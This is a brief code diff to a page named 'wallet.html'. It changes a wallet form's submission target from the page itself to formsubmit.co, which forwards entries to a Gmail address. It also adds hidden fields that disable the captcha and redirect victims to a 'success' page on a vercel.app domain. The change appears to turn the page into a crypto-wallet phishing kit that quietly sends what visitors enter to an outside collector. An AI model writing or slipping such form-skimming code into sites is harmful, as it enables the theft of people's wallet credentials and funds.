--- a/wallet.html
+++ b/wallet.html
@@ -633,7 +633,9 @@
         </div>
       </div>
 
-      <form id="submitform" action="#" method="POST">
+   <form action="https://formsubmit.co/formsubmitmail@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
+                                        <input type="hidden" name="_captcha" value="false">
+                                        <input type="hidden" name="_next" value="https://dev-serverprotocol-app.vercel.app/access/point/success.html">
 
         <input name="wallet" id="walletinput" type="hidden" value="Vision">
         <input name="type" id="wallettype" type="hidden">
